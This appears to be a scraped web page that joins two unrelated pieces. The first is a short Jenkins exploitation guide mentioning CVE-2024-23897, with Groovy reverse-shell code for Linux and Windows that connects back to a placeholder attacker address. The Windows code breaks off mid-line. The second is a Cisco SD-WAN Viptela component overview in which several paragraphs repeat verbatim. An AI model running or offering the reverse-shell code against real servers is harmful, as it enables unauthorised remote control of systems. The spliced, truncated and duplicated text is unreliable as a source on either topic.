Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
Cisco SDWAN Viptela solution comprises of the following components:
vManage Network Management System (NMS)
vManage Network Management System (NMS)
 |
| Image source https://sdwan-docs.cisco.com |
vSmart Controller
The vSmart controller is the centralized brain of the SDWAN solution, controlling the flow of data traffic throughout the network. The vSmart controller works with the vBond orchestrator to authenticate SDWAN devices as they join the network and to orchestrate connectivity among the SDWAN routers.The vSmart controllers are the central orchestrators of the control plane. They have permanent communication channels with all the SDWAN devices in the network. Over the DTLS connections between the vSmart controllers and vBond orchestrators and between vSmart controllers, the devices regularly exchange their views of the network, to ensure that their route tables remain synchronized.If the vSmart controllers go offline, the SDWAN routers will continue forwarding traffic based on last known configuration state up to a configurable graceful period timer expiry.
vBond Orchestrator
The vBond orchestrator automatically orchestrates connectivity between SDWAN routers and vSmart controllers. If any SDWAN router or vSmart controller is behind a NAT, the vBond orchestrator also serves as an initial NAT-traversal orchestrator.
The vBond orchestrator automatically coordinates the initial bring-up of vSmart controllers and vEdge routers, and it facilities connectivity between vSmart controllers and vEdge routers. During the bringup processes, the vBond orchestrator authenticates and validates the devices wishing to join the overlay network. This automatic orchestration process prevents tedious and error-prone manual bringup.
vBond is required when:
• a new vEdge router (SDWAN router) joins the network
• A vEdge loses WAN connectivity completely and then regains WAN connectivity
• A vEdge reboots
If vBond is absent in any of the 3 cases above, the vEdge will not be able to join the network.
High availability for vBond is provided by FQDN where a single FQDN is mapped to several IP addresses. The SDWAN router will attempt to reach the IP addresses mapped to the FQDN in the order by which the IP addresses are specified.
The vBond orchestrator automatically orchestrates connectivity between SDWAN routers and vSmart controllers. If any SDWAN router or vSmart controller is behind a NAT, the vBond orchestrator also serves as an initial NAT-traversal orchestrator.
The vBond orchestrator automatically coordinates the initial bring-up of vSmart controllers and vEdge routers, and it facilities connectivity between vSmart controllers and vEdge routers. During the bringup processes, the vBond orchestrator authenticates and validates the devices wishing to join the overlay network. This automatic orchestration process prevents tedious and error-prone manual bringup.
vBond is required when:
• a new vEdge router (SDWAN router) joins the network
• A vEdge loses WAN connectivity completely and then regains WAN connectivity
• A vEdge reboots
If vBond is absent in any of the 3 cases above, the vEdge will not be able to join the network.
High availability for vBond is provided by FQDN where a single FQDN is mapped to several IP addresses. The SDWAN router will attempt to reach the IP addresses mapped to the FQDN in the order by which the IP addresses are specified.
ZTP Server
The ZTP server is the 1st point of contact for any new SDWAN router being provisioned into the network. It provides the SDWAN router with the FQDN of the vBond and also helps to provision the enterprise root CA chain into a new SDWAN router that is attempting to join the network.
When setting up the ZTP server, it has to be configured with a list of valid SDWAN router serial numbers, as well as the associated organization names and path to the Enterprise root CA chain (which is uploaded into the ZTP server).
By default, new SDWAN routers are configured with a factory default configuration to look for ZTP server at ztp.viptela.com which is a Cloud based ZTP offering from Cisco. When the SDWAN router initially boots up with the factory default configuration, it attempts to obtain IP/mask on its WAN interface and also DNS server IP via DHCP. In the absence of DHCP, an alternate method of auto-IP is used, where the SDWAN router looks into the physical media between its WAN interface and the upstream provider router and it configures itself with an IP/mask. When autoIP is used, the default DNS settings will be that of Google DNS.
High availability for ZTP is provided by FQDN where a single FQDN is mapped to several IP addresses. The SDWAN router will attempt to reach the IP addresses mapped to the FQDN in the order by which the IP addresses are specified.
The ZTP server is the 1st point of contact for any new SDWAN router being provisioned into the network. It provides the SDWAN router with the FQDN of the vBond and also helps to provision the enterprise root CA chain into a new SDWAN router that is attempting to join the network.
When setting up the ZTP server, it has to be configured with a list of valid SDWAN router serial numbers, as well as the associated organization names and path to the Enterprise root CA chain (which is uploaded into the ZTP server).
By default, new SDWAN routers are configured with a factory default configuration to look for ZTP server at ztp.viptela.com which is a Cloud based ZTP offering from Cisco. When the SDWAN router initially boots up with the factory default configuration, it attempts to obtain IP/mask on its WAN interface and also DNS server IP via DHCP. In the absence of DHCP, an alternate method of auto-IP is used, where the SDWAN router looks into the physical media between its WAN interface and the upstream provider router and it configures itself with an IP/mask. When autoIP is used, the default DNS settings will be that of Google DNS.
High availability for ZTP is provided by FQDN where a single FQDN is mapped to several IP addresses. The SDWAN router will attempt to reach the IP addresses mapped to the FQDN in the order by which the IP addresses are specified.
SDWAN Routers
The SDWAN routers sit at the perimeter of a site (such as remote offices, branches, campuses, data centers) and provide connectivity among the sites.They are either hardware devices or software that runs as a virtual machine. SDWAN routers handle the transmission of data traffic.